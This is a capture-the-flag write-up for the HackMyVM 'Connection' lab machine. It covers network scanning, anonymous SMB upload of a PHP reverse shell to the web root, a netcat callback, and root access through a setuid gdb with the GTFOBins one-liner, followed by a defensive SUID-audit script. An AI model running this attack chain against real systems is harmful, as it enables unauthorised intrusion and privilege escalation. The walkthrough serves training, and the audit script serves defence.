
HackmyVM-Connection

Information gathering

┌──(root㉿kali)-[~/Desktop/script]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.77 08:00:27:2a:5f:aa PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
192.168.31.187 a6:9b:e0:2d:30:9a (Unknown: locally administered)
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.984 seconds (129.03 hosts/sec). 5 responded

The target IP is 192.168.31.77; scan its ports with nmap.

┌──(root㉿kali)-[~/Desktop/script]
└─# nmap 192.168.31.77 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 09:09 EST
Nmap scan report for connection (192.168.31.77)
Host is up (0.00064s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:2A:5F:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

Port 445

Port 445 is open.

Enumerate it with enum4linux.

 =================================( Share Enumeration on 192.168.31.77 )=================================


Sharename Type Comment
--------- ---- -------
share Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Private Share for uploading files)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP CONNECTION

[+] Attempting to map shares on 192.168.31.77

//192.168.31.77/share Mapping: OK Listing: OK Writing: N/A
//192.168.31.77/print$ Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.31.77/IPC$ Mapping: N/A Listing: N/A Writing: N/A

smbclient can log in anonymously. The share contains an html directory; uploading an arbitrary file there shows that it is served on port 80, so upload a PHP reverse shell file.

┌──(root㉿kali)-[~/Desktop/script]
└─# smbclient //192.168.31.77/share
Password for [WORKGROUP\root]:
Anonymous login successful
smb: \> cd html\
smb: \html\>
smb: \html\> put rev.php
putting file rev.php as \html\rev.php (447.0 kb/s) (average 447.0 kb/s)
smb: \html\> exit
┌──(root㉿kali)-[~/Desktop/script]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.31.129] from (UNKNOWN) [192.168.31.77] 45632
Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
09:12:44 up 4 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Received the shell.

Privilege escalation

Use python to get a better terminal.

$  python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@connection:/$

Search for SUID files.

www-data@connection:/$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpassw

gdb can be used for SUID privilege escalation.

https://gtfobins.github.io/gtfobins/gdb/

www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
<mport os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

We are now in the root group (euid=0); privilege escalation is complete.
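The root cause of the last step is a setuid copy of gdb. As an added defender-side example (not part of this writeup), the following POSIX shell audit flags SUID binaries that either fall outside a host baseline or belong to a class (debuggers, interpreters, editors) that should never carry the setuid bit. The baseline and the sample input are constructed; adjust the baseline to your own golden image.

```shell
#!/bin/sh
# Added SUID audit (not from the writeup). Reports setuid binaries that are
# absent from a known-good baseline or that can execute arbitrary commands.

# Constructed baseline of expected setuid binaries on a Debian-like host.
BASELINE='/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device'

# Basenames that can spawn a shell or run code; setuid on any of these is a finding.
NEVER_SUID='gdb python python3 perl ruby vim vi nano find bash sh env awk'

# Constructed sample mirroring the find(1) output seen on the target.
SAMPLE_SUID='/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd'

# audit_suid LIST: print "REASON PATH" for every path that fails a check.
audit_suid() {
    printf '%s\n' "$1" | while IFS= read -r p; do
        [ -n "$p" ] || continue
        name=$(basename "$p")
        for bad in $NEVER_SUID; do
            [ "$name" = "$bad" ] && { printf 'DANGEROUS %s\n' "$p"; continue 2; }
        done
        printf '%s\n' "$BASELINE" | grep -Fxq -- "$p" || printf 'UNEXPECTED %s\n' "$p"
    done
}

# Live mode: walk local filesystems for setuid files and audit them.
audit_live() {
    audit_suid "$(find / -xdev -type f -perm -4000 2>/dev/null)"
}

if [ "${1:-}" = "--live" ]; then audit_live; fi
```

Run it with `--live` on a host to audit the real filesystem; without arguments it only defines the functions.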